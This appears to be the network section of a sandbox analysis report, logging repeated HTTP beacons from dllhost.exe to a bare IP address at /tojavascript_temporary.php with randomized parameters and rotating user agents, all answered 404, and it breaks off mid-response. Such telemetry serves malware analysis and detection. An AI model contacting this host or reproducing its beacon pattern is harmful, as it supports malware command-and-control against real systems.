                                                    http://62.109.4.67/tojavascript_temporary.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/csv
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:43 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/csv
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:43 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-gb
                                                    GET
                                                    http://c.pki.goog/r/r1.crl
                                                    Remote address:
                                                    142.250.180.3:80
                                                    Request
                                                    GET /r/r1.crl HTTP/1.1
                                                    Cache-Control: max-age = 3000
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                    User-Agent: Microsoft-CryptoAPI/10.0
                                                    Host: c.pki.goog
                                                    Response
                                                    HTTP/1.1 304 Not Modified
                                                    Date: Sat, 22 Mar 2025 20:32:22 GMT
                                                    Expires: Sat, 22 Mar 2025 21:22:22 GMT
                                                    Age: 21
                                                    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                    Cache-Control: public, max-age=3000
                                                    Vary: Accept-Encoding
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?yKfCYp7HRt7cphJhwk=3Li&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&yKfCYp7HRt7cphJhwk=3Li
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?yKfCYp7HRt7cphJhwk=3Li&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&yKfCYp7HRt7cphJhwk=3Li HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/css
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:57 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?yKfCYp7HRt7cphJhwk=3Li&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&yKfCYp7HRt7cphJhwk=3Li
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?yKfCYp7HRt7cphJhwk=3Li&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&yKfCYp7HRt7cphJhwk=3Li HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/css
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:32:57 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5 HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/javascript
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:06 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&r8a0kQpoJS8QvdWcZUHKR=kqGAKP7nL3uZ8yHLgdSbuyHYY5 HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/javascript
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:06 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/html
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:14 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&KoVgKV3FzYvi7=l301JTjXcPJRuLlIDo&Usxg7aacjuAtmVx1EEU=MyxMF HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/html
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:14 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055 HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/csv
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:27 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&DVXMl5ATgAs=sfj&lUsNPImQzBwtFdEofWtB9qBcwo=Q0BOpvfMyBrE4tGXjJQOC5DhWvhz&SPblQVZxxG8jRQnySzS2TcTfa0Vxd=3NqRfwPcoXqjvCRovpasD6P6l055 HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/csv
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:27 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/plain
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:36 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&SP7MU6X5wQ=YKDKDG9thdykqdIR&6psVwerG6At1R3qprY9Lqokj9HxeoQ=Mpb9GhIlpVEHFQ2QjH59EIF HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/plain
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:36 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/csv
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:46 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&NbwGycNADK710Kqvc50QlPboorpiv=MSPTJ2P1RjJx HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/csv
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:46 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/plain
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 22 Mar 2025 20:33:51 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                  • flag-ru
                                                    GET
                                                    http://62.109.4.67/tojavascript_temporary.php?ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm
                                                    dllhost.exe
                                                    Remote address:
                                                    62.109.4.67:80
                                                    Request
                                                    GET /tojavascript_temporary.php?ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm&d94143207b37a479eeffc320b96bb7ea=60636c747af38b0fa349e91d6c6e29fd&803bb2a00bd013f1ca27a3617e71ea8e=wN1YGZ3YDNkZmNyQzNjhDO1EGOlZTZ3QWY3gjYkN2YjVGZkZWO4gzY&ShxucCb=R9iZwHhfLRTzkDz9r7swQ6&i31WgE1W7ar6wdwHCeNcD=3lPrxDeUoYVWAg5uAbU4VY2GDg5z&SCekp9PHzQy1nwTladPLRe=HIhfsJoQIpnWV1vVgpnLKgDsm HTTP/1.1
                                                    Accept: */*
                                                    Content-Type: text/plain
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 62.109.4.67
                                                    Response
                                                    HTTP/1.1 404 Not Found
